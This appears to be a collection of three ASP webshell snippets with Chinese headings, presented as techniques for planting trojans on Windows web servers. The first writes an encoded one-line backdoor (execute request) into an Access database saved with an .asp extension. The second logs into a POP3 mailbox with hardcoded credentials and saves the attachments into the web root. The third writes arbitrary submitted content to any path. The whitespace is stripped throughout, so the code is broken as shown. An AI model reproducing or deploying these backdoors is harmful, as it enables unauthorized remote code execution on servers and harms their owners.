<%
'codebynetpatch
dimdbfile,sql
db="netpatch.asp"
dbfile=server.MapPath(db)
setydb=server.CreateObject("ADOX.Catalog")
ydb.Create"Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&dbfile
setydb=nothing
iferr.number=0then
Response.Writedbfile&"创建成功<br>"
else
Response.Write"创建失败,原因:"&err.description
Response.End
endif
SetConn=Server.CreateObject("ADODB.Connection")
Conn.Open"Provider=Microsoft.Jet.OLEDB.4.0;DataSource="&dbfile
sql="CREATETABLEfdata([data]Memo)"
conn.execute(sql)
Setrs=CreateObject("ADODB.RecordSet")
rs.Open"FData",conn,1,3
rs.addnew
rs("data")="┼攠數畣整爠煥敵瑳∨≮┩>"'(注释记得去掉!一句话后门executerequest(“n”))
rs.update
%>
用Jmail写文件进硬盘
<%
'codzbykEvin1986[S4T]
User=Request.Form("User")
Pass=Request.Form("Pass")
Popserver=Request.Form("Popserver")
ifUser<>""andPass<>""andPopserver<>""then
Setobjmail=CreateObject("JMail.POP3")
objmail.ConnectUser,Pass,Popserver
setobjmsg=CreateObject("jmail.message")
Setobjmsg=objmail.Messages.item(1)
separator=","
response.write"AttachmentNameis:"&SaveAtta&"<br>"
objmail.Disconnect
Endif
FunctionSaveAtta()
SetAttachments=objmsg.Attachments
separator=","
response.write"ThesizeofthisAttachmentis:"&objmsg.size&"<br>"
Fori=0ToAttachments.Count-1
Ifi=Attachments.Count-1Then
separator=""
EndIf
SetTheatta=Attachments(i)
response.writeTheatta.Name
Theatta.SaveToFile(Server.Mappath(".")&""&Theatta.Name)
Response.write"Oh!HeyGuy.....That'sOK!"
Next
EndFunction
%>
<Html>
<Head>
<Title>JmailSaveFileShell</Title>
</Head>
<Body>
<Center>
<FormMethod="POST">
User:<inputname="User"type=textvalue="kevin1986"><br>
Pass:<inputname="Pass"type=textvalue="1986lovinghuan"><br>
POP3:<inputname="Popserver"type=textvalue="pop.163.com"><br>
<inputtype=submitvalue="GettheAttachmentsOftheFirstMail">
</Form>
</Center>
</Body>
</Html>
利用xml写马
<%onerrorresumenext%>
<formid="form1"name="form1"method="post"action=''''>
<p>木马内容</p>
<p><textareaname="flashboy"cols="80"rows="10"></textarea></p>
<p>路径</p>
<p><inputname="textfield"type="text"size="50"/></p>
<p><inputtype="submit"name="Submit"value="提交"/></p></form>
<p><%Response.write"本文件绝对路径"%>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%></p>
<%
dimxmlString
dimxmlDoc
xmlString=Request("flashboy")
setxmlDoc=server.createObject("Msxml2.DOMDocument")
xmlDoc.loadXml(xmlString)
f=Request("textfield")
xmlDoc.save(f)
setxmlDoc=nothing
%>